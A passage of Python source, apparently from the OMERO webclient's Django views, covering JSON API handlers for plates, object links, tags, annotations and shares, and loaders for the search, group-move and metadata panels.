    return JsonResponse({"plates": marshalled})
@login_required()
def api_plate_acquisition_list(request, conn=None, **kwargs):
    """Return a JSON list of plate acquisitions (runs) for one plate."""
    # Parse query-string parameters.
    try:
        page = get_long_or_default(request, "page", 1)
        limit = get_long_or_default(request, "limit", settings.PAGE)
        plate_id = get_long_or_default(request, "id", None)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    # Orphaned PlateAcquisitions are not possible so querying without a
    # plate is an error
    if plate_id is None:
        return HttpResponseBadRequest("id (plate) must be specified")
    try:
        marshalled = tree.marshal_plate_acquisitions(
            conn=conn, plate_id=plate_id, page=page, limit=limit
        )
    except ApiUsageException as err:
        return HttpResponseBadRequest(err.serverStackTrace)
    except ServerError as err:
        return HttpResponseServerError(err.serverStackTrace)
    except IceException as err:
        return HttpResponseServerError(err.message)
    return JsonResponse({"acquisitions": marshalled})
def get_object_links(conn, parent_type, parent_id, child_type, child_ids):
    """
    Look up the link rows joining a parent container to child objects.
    Used internally by the api_links DELETE handler.

    Returns None when no link can exist (orphaned / experimenter parents),
    otherwise a (link_type, links) tuple.  Raises Http404 for unsupported
    parent/child combinations or when a specific parent has no links.
    """
    if parent_type == "orphaned":
        return None
    if parent_type == "experimenter" and child_type in ("dataset", "plate", "tag"):
        # A dataset/plate/tag "moved" out of the de facto orphaned
        # container: nothing to unlink, and not an error.
        return None
    supported = {
        ("project", "dataset"): "ProjectDatasetLink",
        ("dataset", "image"): "DatasetImageLink",
        ("screen", "plate"): "ScreenPlateLink",
        ("tagset", "tag"): "AnnotationAnnotationLink",
    }
    link_type = supported.get((parent_type, child_type))
    if not link_type:
        raise Http404("json data needs 'parent_type' and 'child_type'")
    params = omero.sys.ParametersI()
    params.addIds(child_ids)
    # Need to fetch child and parent, otherwise
    # AnnotationAnnotationLink is not loaded
    query = (
        """
        from %s olink join fetch olink.child join fetch olink.parent
        where olink.child.id in (:ids)
        """
        % link_type
    )
    if parent_id:
        params.add("pid", rlong(parent_id))
        query += " and olink.parent.id = :pid"
    links = conn.getQueryService().findAllByQuery(query, params, conn.SERVICE_OPTS)
    if parent_id is not None and len(links) == 0:
        raise Http404(
            "No link found for %s-%s to %s-%s"
            % (parent_type, parent_id, child_type, child_ids)
        )
    return link_type, links
def create_link(parent_type, parent_id, child_type, child_id):
    """
    Build (but do not save) an omero.model link object joining a parent
    container to a child.  Used internally by the api_links POST handler.

    Returns the string "orphan" when no link is needed (dataset/plate
    under an experimenter is simply orphaned), or None for unsupported
    parent/child combinations.
    """
    if parent_type == "experimenter" and child_type in ("dataset", "plate"):
        # This is actually not a link that needs creating, this
        # dataset/plate is an orphan
        return "orphan"

    def _build(link_cls, parent_obj, child_obj):
        # Assemble an unloaded link between two unloaded model objects.
        lnk = link_cls()
        lnk.setParent(parent_obj)
        lnk.setChild(child_obj)
        return lnk

    if parent_type == "project" and child_type == "dataset":
        return _build(
            ProjectDatasetLinkI,
            ProjectI(long(parent_id), False),
            DatasetI(long(child_id), False),
        )
    if parent_type == "dataset" and child_type == "image":
        return _build(
            DatasetImageLinkI,
            DatasetI(long(parent_id), False),
            ImageI(long(child_id), False),
        )
    if parent_type == "screen" and child_type == "plate":
        return _build(
            ScreenPlateLinkI,
            ScreenI(long(parent_id), False),
            PlateI(long(child_id), False),
        )
    if parent_type == "tagset" and child_type == "tag":
        return _build(
            AnnotationAnnotationLinkI,
            TagAnnotationI(long(parent_id), False),
            TagAnnotationI(long(child_id), False),
        )
    return None
def get_objects_owners(conn, child_type, child_ids):
    """
    Map each child object's id to the id of its owning experimenter.

    'tag' children are looked up as 'Annotation' objects.
    """
    lookup_type = "Annotation" if child_type == "tag" else child_type
    return {
        obj.id: obj.details.owner.id.val
        for obj in conn.getObjects(lookup_type, child_ids)
    }
@login_required()
def api_links(request, conn=None, **kwargs):
    """
    Entry point for the api_links methods: creates (POST) or deletes
    (DELETE) links between objects, delegating by HTTP method.
    """
    handlers = {"POST": _api_links_POST, "DELETE": _api_links_DELETE}
    handler = handlers.get(request.method)
    if handler is None:
        return JsonResponse(
            {"Error": "Need to POST or DELETE JSON data to update links"}, status=405
        )
    # Decode the JSON payload from the request body.
    try:
        payload = json.loads(request.body)
    except TypeError:
        # for Python 3.5
        payload = json.loads(bytes_to_native_str(request.body))
    return handler(conn, payload)
def _api_links_POST(conn, json_data, **kwargs):
    """Creates links between objects specified by a json
    blob in the request body.
    e.g. {"dataset":{"10":{"image":[1,2,3]}}}
    When creating a link, fails silently if ValidationException
    (E.g. adding an image to a Dataset that already has that image).
    """
    response = {"success": False}
    # json is [parent_type][parent_id][child_type][childIds]
    # e.g. {"dataset":{"10":{"image":[1,2,3]}}}
    linksToSave = []
    write_owned = "WriteOwned" in conn.getCurrentAdminPrivileges()
    user_id = conn.getUserId()
    for parent_type, parents in json_data.items():
        if parent_type in ("orphaned", "experimenter"):
            # No link objects exist for these pseudo-parents.
            continue
        for parent_id, children in parents.items():
            for child_type, child_ids in children.items():
                # batch look-up owners of all child objects
                child_owners = get_objects_owners(conn, child_type, child_ids)
                for child_id in child_ids:
                    parent_id = int(parent_id)
                    link = create_link(parent_type, parent_id, child_type, child_id)
                    if link and link != "orphan":
                        # link owner should match child owner
                        if write_owned and child_owners[child_id] != user_id:
                            link.details.owner = ExperimenterI(
                                child_owners[child_id], False
                            )
                        linksToSave.append(link)
    if len(linksToSave) > 0:
        # Need to set context to correct group (E.g parent group)
        # NOTE(review): ptype/parent_id here are the leaked values from the
        # final loop iteration - assumes a single-parent payload; verify.
        ptype = parent_type.title()
        if ptype in ["Tagset", "Tag"]:
            ptype = "TagAnnotation"
        p = conn.getQueryService().get(ptype, parent_id, conn.SERVICE_OPTS)
        conn.SERVICE_OPTS.setOmeroGroup(p.details.group.id.val)
        logger.info("api_link: Saving %s links" % len(linksToSave))
        try:
            # We try to save all at once, for speed.
            conn.saveArray(linksToSave)
            response["success"] = True
        except Exception:
            logger.info(
                "api_link: Exception on saveArray with %s links" % len(linksToSave)
            )
            # If this fails, e.g. ValidationException because link
            # already exists, try to save individual links
            for link in linksToSave:
                try:
                    conn.saveObject(link)
                except Exception:
                    pass
            response["success"] = True
    return JsonResponse(response)
def _api_links_DELETE(conn, json_data):
    """Deletes links between objects specified by a json
    blob in the request body.
    e.g. {"dataset":{"10":{"image":[1,2,3]}}}
    """
    response = {"success": False}
    # json is [parent_type][parent_id][child_type][childIds]
    # e.g. {"dataset":{"10":{"image":[1,2,3]}}}
    for parent_type, parents in json_data.items():
        if parent_type == "orphaned":
            continue
        for parent_id, children in parents.items():
            for child_type, child_ids in children.items():
                # Resolve the link rows joining this parent to the children.
                objLnks = get_object_links(
                    conn, parent_type, parent_id, child_type, child_ids
                )
                if objLnks is None:
                    # Nothing to delete (e.g. de facto orphaned container).
                    continue
                linkType, links = objLnks
                linkIds = [r.id.val for r in links]
                logger.info("api_link: Deleting %s links" % len(linkIds))
                conn.deleteObjects(linkType, linkIds, wait=True)
                # webclient needs to know what is orphaned
                linkType, remainingLinks = get_object_links(
                    conn, parent_type, None, child_type, child_ids
                )
                # return remaining links in same format as json above
                # e.g. {"dataset":{"10":{"image":[1,2,3]}}}
                for rl in remainingLinks:
                    pid = rl.parent.id.val
                    cid = rl.child.id.val
                    # Deleting links still in progress above - ignore these
                    if pid == int(parent_id):
                        continue
                    if parent_type not in response:
                        response[parent_type] = {}
                    if pid not in response[parent_type]:
                        response[parent_type][pid] = {child_type: []}
                    response[parent_type][pid][child_type].append(cid)
    # If we got here, DELETE was OK
    response["success"] = True
    return JsonResponse(response)
@login_required()
def api_parent_links(request, conn=None, **kwargs):
    """
    Get a list of links as
    {'data': [{id: 12, child:{type:'image', id:1},
               parent:{type:'dataset', id:2}] }
    Supports ?image=1,2 and ?image=1&image=2
    """
    child_to_parent = {"image": "dataset", "dataset": "project", "plate": "screen"}
    data = []
    for child_type, parent_type in child_to_parent.items():
        raw_ids = request.GET.getlist(child_type)
        if len(raw_ids) == 0:
            continue
        # Flatten both the ?image=1,2 and ?image=1&image=2 forms.
        child_ids = [part for value in raw_ids for part in value.split(",")]
        link_type, links = get_object_links(
            conn, parent_type, None, child_type, child_ids
        )
        for lnk in links:
            data.append(
                {
                    "id": lnk.id.val,
                    "parent": {"type": parent_type, "id": lnk.parent.id.val},
                    "child": {"type": child_type, "id": lnk.child.id.val},
                }
            )
    return JsonResponse({"data": data})
@login_required()
def api_paths_to_object(request, conn=None, **kwargs):
    """
    This finds the paths to objects in the hierarchy. It returns only
    the path, not the object hierarchy itself.

    An example usage is the 'show' functionality: to go to the image with
    id 1 somewhere in the tree, http://localhost:8000/webclient/?show=image-1
    asks this method what the webclient needs to dynamically load to
    display it in the jstree.
    """

    def _long_param(name, default=None):
        # Shorthand for reading one long-valued query parameter.
        return get_long_or_default(request, name, default)

    try:
        experimenter_id = _long_param("experimenter")
        project_id = _long_param("project")
        dataset_id = _long_param("dataset")
        image_id = _long_param("image")
        screen_id = _long_param("screen")
        plate_id = _long_param("plate")
        acquisition_id = _long_param("run")
        # acquisition will override 'run' if both are specified as they are
        # the same thing
        acquisition_id = _long_param("acquisition", acquisition_id)
        well_id = request.GET.get("well", None)
        tag_id = _long_param("tag")
        tagset_id = _long_param("tagset")
        roi_id = _long_param("roi")
        shape_id = _long_param("shape")
        group_id = _long_param("group")
        page_size = _long_param("page_size", settings.PAGE)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    if tag_id is not None or tagset_id is not None:
        paths = paths_to_tag(conn, experimenter_id, tagset_id, tag_id)
    else:
        paths = paths_to_object(
            conn,
            experimenter_id,
            project_id,
            dataset_id,
            image_id,
            screen_id,
            plate_id,
            acquisition_id,
            well_id,
            group_id,
            page_size,
            roi_id,
            shape_id,
        )
    return JsonResponse({"paths": paths})
@login_required()
def api_tags_and_tagged_list(request, conn=None, **kwargs):
    """Dispatch the tags-and-tagged listing by HTTP method.

    GET lists tags (and tagged objects); DELETE removes tags by id.
    Previously any other method (e.g. POST) fell through and returned
    None, which crashes Django's response handling — now it is
    rejected explicitly with a 400 response.
    """
    if request.method == "GET":
        return api_tags_and_tagged_list_GET(request, conn, **kwargs)
    elif request.method == "DELETE":
        return api_tags_and_tagged_list_DELETE(request, conn, **kwargs)
    return HttpResponseBadRequest("Unsupported method: %s" % request.method)
def api_tags_and_tagged_list_GET(request, conn=None, **kwargs):
    """List tags and, optionally, the objects tagged with a given tag.

    Specifying 'id' (a tag id) returns any sub-tags, sub-tagsets and
    objects tagged with that id. Without an id, only tags that have
    no parent are returned.
    """
    # Parse query parameters, rejecting anything malformed with a 400.
    try:
        page = get_long_or_default(request, "page", 1)
        limit = get_long_or_default(request, "limit", settings.PAGE)
        group_id = get_long_or_default(request, "group", -1)
        tag_id = get_long_or_default(request, "id", None)
        experimenter_id = get_long_or_default(request, "experimenter_id", -1)
        orphaned = get_bool_or_default(request, "orphaned", False)
        load_pixels = get_bool_or_default(request, "sizeXYZ", False)
        date = get_bool_or_default(request, "date", False)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")

    try:
        if tag_id is None:
            # No tag specified: just list the tags under no parent.
            payload = {
                "tags": tree.marshal_tags(
                    conn=conn,
                    orphaned=orphaned,
                    experimenter_id=experimenter_id,
                    tag_id=tag_id,
                    group_id=group_id,
                    page=page,
                    limit=limit,
                )
            }
        else:
            # Get ALL data (all owners) under the specified tag.
            payload = tree.marshal_tagged(
                conn=conn,
                experimenter_id=experimenter_id,
                tag_id=tag_id,
                group_id=group_id,
                page=page,
                load_pixels=load_pixels,
                date=date,
                limit=limit,
            )
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)

    return JsonResponse(payload)
def api_tags_and_tagged_list_DELETE(request, conn=None, **kwargs):
    """Delete the tags identified by the 'id' request parameter(s)."""
    # Parse the tag ids; malformed values give a 400.
    try:
        tag_ids = get_longs(request, "id")
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    try:
        # Batch all the deletions into a single DoAll server request.
        batch = omero.cmd.DoAll()
        batch.requests = [
            omero.cmd.Delete("/Annotation", tag_id) for tag_id in tag_ids
        ]
        handle = conn.c.sf.submit(batch, conn.SERVICE_OPTS)
        try:
            conn._waitOnCmd(handle)
        finally:
            # Always release the server-side handle, even on failure.
            handle.close()
    except CmdError as e:
        return HttpResponseBadRequest(e.message)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    return JsonResponse("")
@login_required()
def api_annotations(request, conn=None, **kwargs):
    """Marshal annotations for the objects named in the query string.

    Returns a JSON dict with 'annotations' and the 'experimenters'
    who own them.
    """
    params = request.GET
    page = get_long_or_default(request, "page", 1)
    limit = get_long_or_default(request, "limit", ANNOTATIONS_LIMIT)
    anns, exps = tree.marshal_annotations(
        conn,
        project_ids=get_list(request, "project"),
        dataset_ids=get_list(request, "dataset"),
        image_ids=get_list(request, "image"),
        screen_ids=get_list(request, "screen"),
        plate_ids=get_list(request, "plate"),
        run_ids=get_list(request, "acquisition"),
        well_ids=get_list(request, "well"),
        ann_type=params.get("type", None),
        ns=params.get("ns", None),
        page=page,
        limit=limit,
    )
    return JsonResponse({"annotations": anns, "experimenters": exps})
@login_required()
def api_share_list(request, conn=None, **kwargs):
    """List shares and discussions for the given member/owner filters."""
    # Parse paging / filter parameters; bad values give a 400.
    try:
        page = get_long_or_default(request, "page", 1)
        limit = get_long_or_default(request, "limit", settings.PAGE)
        member_id = get_long_or_default(request, "member_id", -1)
        owner_id = get_long_or_default(request, "owner_id", -1)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    # Like api_container_list, this combines two result sets, each of
    # which can return up to 'limit' entries per page.
    common = dict(
        conn=conn, member_id=member_id, owner_id=owner_id, page=page, limit=limit
    )
    try:
        shares = tree.marshal_shares(**common)
        discussions = tree.marshal_discussions(**common)
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    return JsonResponse({"shares": shares, "discussions": discussions})
@login_required()
@render_response()
def load_plate(request, o1_type=None, o1_id=None, conn=None, **kwargs):
    """
    This loads data for the center panel, via AJAX calls.
    Used for Datasets, Plates & Orphaned Images.
    """
    # get index of the plate
    index = getIntOrDefault(request, "index", 0)

    # prepare data. E.g. kw = {} or {'plate': 301L} or
    # 'acquisition': 301L}
    kw = dict()
    if o1_type is not None:
        if o1_id is not None and int(o1_id) > 0:
            # NOTE: 'long' here is py2-style; presumably aliased to int
            # elsewhere in this module for py3 — confirm.
            kw[str(o1_type)] = long(o1_id)

    try:
        manager = BaseContainer(conn, **kw)
    except AttributeError as x:
        return handlerInternalError(request, x)

    # prepare forms
    form_well_index = None

    context = {"manager": manager, "form_well_index": form_well_index, "index": index}

    # load data & template
    template = None
    if "plate" in kw or "acquisition" in kw:
        fields = manager.getNumberOfFields()
        if fields is not None:
            form_well_index = WellIndexForm(initial={"index": index, "range": fields})
            if index == 0:
                # default to the first available field index
                index = fields[0]
        # Show parameter will be well-1|well-2
        show = request.GET.get("show")
        if show is not None:
            wells_to_select = []
            for w in show.split("|"):
                if "well-" in w:
                    wells_to_select.append(w.replace("well-", ""))
            context["select_wells"] = ",".join(wells_to_select)

        context["baseurl"] = reverse("webgateway").rstrip("/")
        context["form_well_index"] = form_well_index
        context["index"] = index
        context["thumbnails_batch"] = settings.THUMBNAILS_BATCH
        template = "webclient/data/plate.html"
        if o1_type == "acquisition":
            context["acquisition"] = o1_id
    # NOTE(review): 'template' stays None unless a plate/acquisition was
    # requested — downstream render_response presumably handles that.
    context["isLeader"] = conn.isLeader()
    context["template"] = template
    return context
@login_required()
@render_response()
def load_chgrp_groups(request, conn=None, **kwargs):
    """
    Get the potential groups we can move selected data to.
    These will be groups that the owner(s) of selected objects is a member of.
    Objects are specified by query string like: ?Image=1,2&Dataset=3
    If no selected objects are specified, simply list the groups that the
    current user is a member of.
    Groups list will exclude the 'current' group context.
    """
    ownerIds = []
    currentGroups = set()
    groupSets = []
    groups = {}
    owners = {}
    # Collect the owners and current groups of all selected objects.
    for dtype in ("Project", "Dataset", "Image", "Screen", "Plate"):
        oids = request.GET.get(dtype, None)
        if oids is not None:
            for o in conn.getObjects(dtype, oids.split(",")):
                ownerIds.append(o.getDetails().owner.id.val)
                currentGroups.add(o.getDetails().group.id.val)
    ownerIds = list(set(ownerIds))
    # In case we were passed no objects or they weren't found
    if len(ownerIds) == 0:
        ownerIds = [conn.getUserId()]
    for owner in conn.getObjects(
        "Experimenter", ownerIds, opts={"load_experimentergroups": True}
    ):
        # Each owner has a set of groups
        gids = []
        owners[owner.id] = owner.getFullName()
        for group in owner.copyGroupExperimenterMap():
            groups[group.parent.id.val] = group.parent
            gids.append(group.parent.id.val)
        groupSets.append(set(gids))

    # Can move to groups that all owners are members of...
    # NOTE(review): if no Experimenter was found, groupSets is empty and
    # set.intersection(*[]) raises TypeError — confirm callers can't hit this.
    targetGroupIds = set.intersection(*groupSets)
    # ...but not 'user' group
    userGroupId = conn.getAdminService().getSecurityRoles().userGroupId
    if userGroupId in targetGroupIds:
        targetGroupIds.remove(userGroupId)

    # if all the Objects are in a single group, exclude it from the target
    # groups
    if len(currentGroups) == 1:
        curr_grp = currentGroups.pop()
        if curr_grp in targetGroupIds:
            targetGroupIds.remove(curr_grp)

    def getPerms(group):
        # Summarise a group's permissions for the JSON response.
        p = group.getDetails().permissions
        return {
            "write": p.isGroupWrite(),
            "annotate": p.isGroupAnnotate(),
            "read": p.isGroupRead(),
        }

    # From groupIds, create a list of group dicts for json
    targetGroups = []
    for gid in targetGroupIds:
        targetGroups.append(
            {"id": gid, "name": groups[gid].name.val, "perms": getPerms(groups[gid])}
        )
    targetGroups.sort(key=lambda x: x["name"])
    # Convert owners dict to a JSON-friendly list of [id, fullName] pairs.
    owners = [[k, v] for k, v in owners.items()]
    return {"owners": owners, "groups": targetGroups}
@login_required()
@render_response()
def load_chgrp_target(request, group_id, target_type, conn=None, **kwargs):
    """Load a tree for the user to pick a target Project, Dataset or Screen."""
    # Filter by the destination group without switching the session group.
    conn.SERVICE_OPTS.setOmeroGroup(int(group_id))
    owner = getIntOrDefault(request, "owner", None)
    manager = BaseContainer(conn)
    manager.listContainerHierarchy(owner)
    return {
        "manager": manager,
        "target_type": target_type,
        "template": "webclient/data/chgrp_target_tree.html",
    }
@login_required()
@render_response()
def load_searching(request, form=None, conn=None, **kwargs):
    """
    Handles AJAX calls to search.

    When 'form' is not None a search is performed using the query-string
    parameters; otherwise the search home page template is returned.
    """
    manager = BaseSearch(conn)

    foundById = []
    # form = 'form' if we are searching. Get query from request...
    r = request.GET
    if form is not None:
        query_search = r.get("query", None)
        if query_search is None:
            return HttpResponse("No search '?query' included")
        # '+' is URL-encoding for space
        query_search = query_search.replace("+", " ")
        advanced = toBoolean(r.get("advanced"))
        # If this is an advanced search use 'advanced_search' for query
        if advanced:
            query_search = r.get("advanced_search")
        template = "webclient/search/search_details.html"

        onlyTypes = r.getlist("datatype")
        fields = r.getlist("field")
        searchGroup = r.get("searchGroup", None)
        ownedBy = r.get("ownedBy", None)

        useAcquisitionDate = toBoolean(r.get("useAcquisitionDate"))
        startdate = r.get("startdateinput", None)
        startdate = startdate is not None and smart_str(startdate) or None
        enddate = r.get("enddateinput", None)
        enddate = enddate is not None and smart_str(enddate) or None
        date = None
        if startdate is not None:
            if enddate is None:
                # default the end of the date range to today
                n = datetime.datetime.now()
                enddate = "%s-%02d-%02d" % (n.year, n.month, n.day)
            date = "%s_%s" % (startdate, enddate)

        # by default, if user has not specified any types:
        if len(onlyTypes) == 0:
            onlyTypes = ["images"]

        # search is carried out and results are stored in
        # manager.containers.images etc.
        manager.search(
            query_search,
            onlyTypes,
            fields,
            searchGroup,
            ownedBy,
            useAcquisitionDate,
            date,
            rawQuery=advanced,
        )

        # if the query is only numbers (separated by commas or spaces)
        # we search for objects by ID
        isIds = re.compile(r"^[\d ,]+$")
        if isIds.search(query_search) is not None:
            # search by ID across all groups
            conn.SERVICE_OPTS.setOmeroGroup(-1)
            idSet = set()
            for queryId in re.split(" |,", query_search):
                if len(queryId) == 0:
                    continue
                try:
                    searchById = long(queryId)
                    if searchById in idSet:
                        # skip duplicate ids in the query
                        continue
                    idSet.add(searchById)
                    for t in onlyTypes:
                        t = t[0:-1]  # remove 's'
                        if t in (
                            "project",
                            "dataset",
                            "image",
                            "screen",
                            "plate",
                            "well",
                        ):
                            obj = conn.getObject(t, searchById)
                            if obj is not None:
                                foundById.append({"otype": t, "obj": obj})
                except ValueError:
                    pass
    else:
        # simply display the search home page.
        template = "webclient/search/search.html"

    context = {
        "manager": manager,
        "foundById": foundById,
        "resultCount": manager.c_size + len(foundById),
    }
    context["template"] = template
    context["thumbnails_batch"] = settings.THUMBNAILS_BATCH
    return context
@login_required()
@render_response()
def load_metadata_details(request, c_type, c_id, conn=None, share_id=None, **kwargs):
    """
    This page is the right-hand panel 'general metadata', first tab only.
    Shown for Projects, Datasets, Images, Screens, Plates, Wells, Tags etc.
    The data and annotations are loaded by the manager. Display of appropriate
    data is handled by the template.
    """
    # the index of a field within a well
    index = getIntOrDefault(request, "index", 0)
    context = dict()

    # we only expect a single object, but forms can take multiple objects
    images = c_type == "image" and list(conn.getObjects("Image", [c_id])) or list()
    datasets = (
        c_type == "dataset" and list(conn.getObjects("Dataset", [c_id])) or list()
    )
    projects = (
        c_type == "project" and list(conn.getObjects("Project", [c_id])) or list()
    )
    screens = c_type == "screen" and list(conn.getObjects("Screen", [c_id])) or list()
    plates = c_type == "plate" and list(conn.getObjects("Plate", [c_id])) or list()
    acquisitions = (
        c_type == "acquisition"
        and list(conn.getObjects("PlateAcquisition", [c_id]))
        or list()
    )
    shares = (
        (c_type == "share" or c_type == "discussion")
        and [conn.getShare(c_id)]
        or list()
    )
    wells = c_type == "well" and list(conn.getObjects("Well", [c_id])) or list()

    # we simply set up the annotation form, passing the objects to be
    # annotated.
    selected = {
        "images": c_type == "image" and [c_id] or [],
        "datasets": c_type == "dataset" and [c_id] or [],
        "projects": c_type == "project" and [c_id] or [],
        "screens": c_type == "screen" and [c_id] or [],
        "plates": c_type == "plate" and [c_id] or [],
        "acquisitions": c_type == "acquisition" and [c_id] or [],
        "wells": c_type == "well" and [c_id] or [],
        "shares": ((c_type == "share" or c_type == "discussion") and [c_id] or []),
    }

    initial = {
        "selected": selected,
        "images": images,
        "datasets": datasets,
        "projects": projects,
        "screens": screens,
        "plates": plates,
        "acquisitions": acquisitions,
        "wells": wells,
        "shares": shares,
    }

    form_comment = None
    figScripts = None
    if c_type in ("share", "discussion"):
        # Shares/discussions get their own template and comment form.
        template = "webclient/annotations/annotations_share.html"
        manager = BaseShare(conn, c_id)
        manager.getAllUsers(c_id)
        manager.getComments(c_id)
        form_comment = CommentAnnotationForm(initial=initial)
    else:
        try:
            manager = BaseContainer(conn, **{str(c_type): long(c_id), "index": index})
        except AttributeError as x:
            return handlerInternalError(request, x)
        if share_id is not None:
            # viewing an object within a share
            template = "webclient/annotations/annotations_share.html"
            context["share"] = BaseShare(conn, share_id)
        else:
            template = "webclient/annotations/metadata_general.html"
            context["canExportAsJpg"] = manager.canExportAsJpg(request)
            context["annotationCounts"] = manager.getAnnotationCounts()
            figScripts = manager.listFigureScripts()
    context["manager"] = manager

    if c_type in ("tag", "tagset"):
        context["insight_ns"] = omero.rtypes.rstring(
            omero.constants.metadata.NSINSIGHTTAGSET
        ).val
    if form_comment is not None:
        context["form_comment"] = form_comment

    context["figScripts"] = figScripts
    context["template"] = template
    context["webclient_path"] = reverse("webindex")
    return context
@login_required()
@render_response()
def load_metadata_preview(request, c_type, c_id, conn=None, share_id=None, **kwargs):
    """
    This is the image 'Preview' tab for the right-hand panel.

    Builds the list of rendering definitions (one per owner) and the
    rdef query strings used by the viewer.
    """
    context = {}
    # the index of a field within a well
    index = getIntOrDefault(request, "index", 0)
    manager = BaseContainer(conn, **{str(c_type): long(c_id)})
    if share_id:
        context["share"] = BaseShare(conn, share_id)
    if c_type == "well":
        # preview the image at the requested field index of the well
        manager.image = manager.well.getImage(index)
    allRdefs = manager.image.getAllRenderingDefs()
    rdefs = {}
    rdefId = manager.image.getRenderingDefId()
    # remove duplicates per user
    for r in allRdefs:
        ownerId = r["owner"]["id"]
        r["current"] = r["id"] == rdefId
        # if duplicate rdefs for user, pick one with highest ID
        if ownerId not in rdefs or rdefs[ownerId]["id"] < r["id"]:
            rdefs[ownerId] = r
    # NOTE: under Python 3 this is a dict view, iterated twice below
    rdefs = rdefs.values()
    # format into rdef strings,
    # E.g. {c: '1|3118:35825$FF0000,2|2086:18975$FFFF00', m: 'c'}
    rdefQueries = []
    for r in rdefs:
        chs = []
        for i, c in enumerate(r["c"]):
            # '-' prefix marks an inactive channel
            act = "-"
            if c["active"]:
                act = ""
            color = c["lut"] if "lut" in c else c["color"]
            # NOTE(review): local 'reverse' shadows the url 'reverse'
            # helper used elsewhere in this module (safe here, but fragile).
            reverse = "r" if c["inverted"] else "-r"
            chs.append(
                "%s%s|%s:%s%s$%s" % (act, i + 1, c["start"], c["end"], reverse, color)
            )
        rdefQueries.append(
            {
                "id": r["id"],
                "owner": r["owner"],
                "c": ",".join(chs),
                "m": r["model"] == "greyscale" and "g" or "c",
            }
        )
    max_w, max_h = conn.getMaxPlaneSize()
    size_x = manager.image.getSizeX()
    size_y = manager.image.getSizeY()
    # images bigger than the max plane size must be viewed tiled
    context["tiledImage"] = (size_x * size_y) > (max_w * max_h)
    context["manager"] = manager
    context["rdefsJson"] = json.dumps(rdefQueries)
    context["rdefs"] = rdefs
    context["template"] = "webclient/annotations/metadata_preview.html"
    return context
@login_required()
@render_response()
def load_metadata_hierarchy(request, c_type, c_id, conn=None, **kwargs):
    """
    Load the ancestors of the specified object for display in a static
    tree. Used by an AJAX call from the metadata_general panel.
    """
    manager = BaseContainer(conn, **{str(c_type): long(c_id)})
    return {
        "manager": manager,
        "template": "webclient/annotations/metadata_hierarchy.html",
    }
@login_required()
@render_response()
def load_metadata_acquisition(
    request, c_type, c_id, conn=None, share_id=None, **kwargs
):
    """
    The acquisition tab of the right-hand panel. Only loaded for images.
    TODO: urls regex should make sure that c_type is only 'image' OR 'well'

    Builds the (unbound) metadata forms for channels, objectives,
    microscope, filters, dichroics, detectors and light sources.
    """
    try:
        if c_type in ("share", "discussion"):
            template = "webclient/annotations/annotations_share.html"
            manager = BaseShare(conn, c_id)
            manager.getAllUsers(c_id)
            manager.getComments(c_id)
        else:
            template = "webclient/annotations/metadata_acquisition.html"
            manager = BaseContainer(conn, **{str(c_type): long(c_id)})
    except AttributeError as x:
        return handlerInternalError(request, x)

    form_environment = None
    form_objective = None
    form_microscope = None
    form_instrument_objectives = list()
    form_stageLabel = None
    form_filters = list()
    form_dichroics = list()
    form_detectors = list()
    form_channels = list()
    form_lasers = list()

    # light-source type enums, shared by channel and instrument forms
    lasertypes = list(conn.getEnumerationEntries("LaserType"))
    arctypes = list(conn.getEnumerationEntries("ArcType"))
    filamenttypes = list(conn.getEnumerationEntries("FilamentType"))

    # various enums we need for the forms (don't load unless needed)
    mediums = None
    immersions = None
    corrections = None

    if c_type == "image":
        if share_id is None:
            manager.companionFiles()
        manager.channelMetadata()
        # Build one form-set per channel.
        for theC, ch in enumerate(manager.channel_metadata):
            logicalChannel = ch.getLogicalChannel()
            if logicalChannel is not None:
                channel = dict()
                channel["form"] = MetadataChannelForm(
                    initial={
                        "logicalChannel": logicalChannel,
                        "exWave": ch.getExcitationWave(units=True),
                        "emWave": ch.getEmissionWave(units=True),
                        "illuminations": list(
                            conn.getEnumerationEntries("IlluminationI")
                        ),
                        "contrastMethods": list(
                            conn.getEnumerationEntries("ContrastMethodI")
                        ),
                        "modes": list(conn.getEnumerationEntries("AcquisitionModeI")),
                    }
                )
                # 9853 Much metadata is not available to 'shares'
                if share_id is None:
                    lightPath = logicalChannel.getLightPath()
                    if lightPath is not None:
                        channel["form_dichroic"] = None
                        channel["form_excitation_filters"] = list()
                        channel["form_emission_filters"] = list()
                        lightPathDichroic = lightPath.getDichroic()
                        if lightPathDichroic is not None:
                            channel["form_dichroic"] = MetadataDichroicForm(
                                initial={"dichroic": lightPathDichroic}
                            )
                        filterTypes = list(conn.getEnumerationEntries("FilterTypeI"))
                        for f in lightPath.getEmissionFilters():
                            channel["form_emission_filters"].append(
                                MetadataFilterForm(
                                    initial={"filter": f, "types": filterTypes}
                                )
                            )
                        for f in lightPath.getExcitationFilters():
                            channel["form_excitation_filters"].append(
                                MetadataFilterForm(
                                    initial={"filter": f, "types": filterTypes}
                                )
                            )

                    detectorSettings = logicalChannel.getDetectorSettings()
                    if (
                        detectorSettings._obj is not None
                        and detectorSettings.getDetector()
                    ):
                        channel["form_detector_settings"] = MetadataDetectorForm(
                            initial={
                                "detectorSettings": detectorSettings,
                                "detector": detectorSettings.getDetector(),
                                "types": list(
                                    conn.getEnumerationEntries("DetectorTypeI")
                                ),
                                "binnings": list(conn.getEnumerationEntries("Binning")),
                            }
                        )

                    lightSourceSettings = logicalChannel.getLightSourceSettings()
                    if (
                        lightSourceSettings is not None
                        and lightSourceSettings._obj is not None
                    ):
                        lightSrc = lightSourceSettings.getLightSource()
                        if lightSrc is not None:
                            # pick the enum list matching the source class
                            lstypes = lasertypes
                            if lightSrc.OMERO_CLASS == "Arc":
                                lstypes = arctypes
                            elif lightSrc.OMERO_CLASS == "Filament":
                                lstypes = filamenttypes
                            channel["form_light_source"] = MetadataLightSourceForm(
                                initial={
